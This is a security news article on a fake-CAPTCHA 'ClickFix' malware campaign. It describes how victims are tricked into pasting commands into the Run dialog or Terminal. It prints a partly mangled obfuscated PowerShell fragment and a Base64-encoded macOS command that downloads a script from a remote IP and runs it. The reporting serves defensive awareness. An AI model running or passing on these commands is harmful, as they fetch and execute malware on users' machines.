BURSTA sophisticated new malware campaign has emerged that weaponizes fake CAPTCHA verification pages to trick users into executing malicious PowerShell commands, marking a significant evolution in browser-based attack methodologies.
The campaign, dubbed “ClickFix,” represents what cybersecurity experts are calling a next-generation mutation of traditional fake browser update scams that dominated the threat landscape throughout 2024.
The attack begins when victims encounter what appears to be a legitimate CAPTCHA verification challenge, complete with familiar Google reCAPTCHA or Cloudflare branding.
However, instead of solving a traditional puzzle, users are instructed to verify their humanity through a series of keyboard shortcuts that ultimately result in the execution of hidden malicious code.
.webp){kind=spacer}
The deceptive interface copies a PowerShell command to the victim’s clipboard, then guides them through seemingly harmless steps like pressing Windows+R, Ctrl+V, and Enter to “complete verification.”
What makes this campaign particularly dangerous is its rapid evolution from simple malvertising to sophisticated, multi-platform operations targeting Windows, macOS, and Linux systems.
.webp)
The attack has successfully displaced earlier fake browser update schemes by eliminating the need for suspicious file downloads and leveraging trusted infrastructure to appear legitimate.
Guardio researchers identified this campaign as part of their ongoing monitoring of browser-based threats, noting how attackers have refined their approach across three critical dimensions: propagation methods, narrative sophistication, and evasion techniques.
The research team observed the campaign’s migration from basic pop-up advertisements on questionable websites to highly targeted phishing emails impersonating legitimate services like Booking.com.
Technical Evolution and Cross-Platform Expansion
The most concerning aspect of CAPTCHAgeddon is its technical sophistication and cross-platform capabilities.
.webp)
Initial Windows-focused attacks utilized heavily obfuscated PowerShell commands designed to evade signature-based detection systems. For example, attackers transformed simple commands into complex variations like:-
POWERSHELL -N"oP"r"OF"I /w h /"COM"ma "$s"r"t15 = 'c"m"b"k"z8b"ui0000"08k"2"2bcm3"b"[3k.info]When deobfuscated, this reveals a straightforward payload delivery mechanism that fetches and executes remote code from attacker-controlled infrastructure.
The campaign’s expansion to macOS represents a particularly alarming development, as it exploits the unfamiliarity most Mac users have with command-line interfaces.
The macOS variant instructs victims to open Terminal through Spotlight search and execute Base64-encoded bash commands. A typical macOS payload appears as:
echo "Y3VybCAtcyBodHRwOi8vNDUuMTM1LjIzMi4zMy9kL3JvYmVydG84NTg2NiB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bashWhen decoded, this command performs a silent download and execution of malware from compromised servers.
.webp)
The attackers have also begun leveraging Google Scripts platform to host their malicious captcha flows, exploiting Google’s trusted reputation to bypass security filters while maintaining the appearance of legitimate verification processes.
.webp)
The campaign’s infrastructure analysis reveals highly organized operations, with clustering analysis identifying distinct attacker groups using consistent command patterns and domain structures.
One notable cluster consistently employed clean PowerShell syntax with .run and .press top-level domains, suggesting automated toolkit usage rather than manual campaign development.
Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial
The post CAPTCHAgeddon – New ClickFix Attack Leverages Fake Captcha to Deliver Malware Payload appeared first on Cyber Security News.